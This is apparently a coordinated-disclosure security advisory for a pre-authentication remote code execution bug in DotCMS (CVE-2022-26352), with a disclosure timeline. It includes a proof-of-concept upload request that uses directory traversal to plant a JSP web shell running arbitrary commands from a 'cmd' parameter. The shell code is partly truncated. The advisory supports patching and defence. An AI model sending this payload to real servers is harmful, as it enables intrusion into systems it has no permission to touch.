Research Notes
May 3, 2022

Advisory: DotCMS Remote Code Execution (CVE-2022-26352)

No items found.
Creative Commons license


A pre-auth remote code execution vulnerability was found in DotCMS which was achievable by performing a directory traversal attack during file upload. This vulnerability ultimately allows attacker to execute arbitrary commands on the underlying system.

This vulnerability is exploitable with the default configuration of DotCMS and was tested on version 22.01.

The CVE for this issue is CVE-2022-26352. The advisory from DotCMS can be found here.


An attacker can upload arbitrary files to the system. By uploading a JSP file to the tomcat’s root directory, it is possible to achieve code execution, leading to command execution. An attacker can ultimately execute arbitrary commands on the underlying system.

Affected Software

The vulnerability was confirmed on 22.01 and below. This vulnerability may also work on 22.02, however this has not been confirmed.

Product Description

dotCMS is an open source content management system written in Java for managing content and content driven sites and applications.


The remediation details provided from DotCMS’s advisory are satisfactory and will ensure that this vulnerabilty cannot be exploited.

The knowledge base article detailing the patches or workaround to apply can be found here.


POST /api/content/ HTTP/1.1
Host: re.local:8443
User-Agent: curl/7.64.1
Accept: */*
Content-Length: 1162
Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3
Connection: close

Content-Disposition: form-data; name="name"; filename="../../../../../../../../../srv/dotserver/tomcat-9.0.41/webapps/ROOT/html/js/dojo/a.jsp"
Content-Type: text/plain

<%@ page import="java.util.*,*"%>
Commands with JSP
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<BR>");
    Process p;
    if ( System.getProperty("").toLowerCase().indexOf("windows") != -1){
        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
        p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
    disr = dis.readLine();

Blog Post

The blog post detailing the steps taken for the discovery of this vulnerability can be found here.


Assetnote Security Research Team


The timeline for this disclosure process can be found below:

  • Feb 21st, 2022: Disclosure of RCE to DotCMS
  • Mar 2nd, 2022: Initial response from DotCMS asking us about who will be filing the CVE
  • Mar 2nd, 2022: We responded asking DotCMS to file the CVE
  • Mar 31st, 2022: We asked if a CVE has been filed and for updates on the vulnerability
  • Mar 31st, 2022: Response from DotCMS providing details on fixes that have been deployed and progress
  • Apr 26th, 2022: We let DotCMS team know that we will be publishing the vulnerability as per our co-ordinated disclosure process
Written by:
Shubham Shah
Your subscription could not be saved. Please try again.
Your subscription has been successful.

Get updates on our research

Subscribe to our newsletter and stay updated on the newest research, security advisories, and more!

Ready to get started?

Get on a call with our team and learn how Assetnote can change the way you secure your attack surface. We'll set you up with a trial instance so you can see the impact for yourself.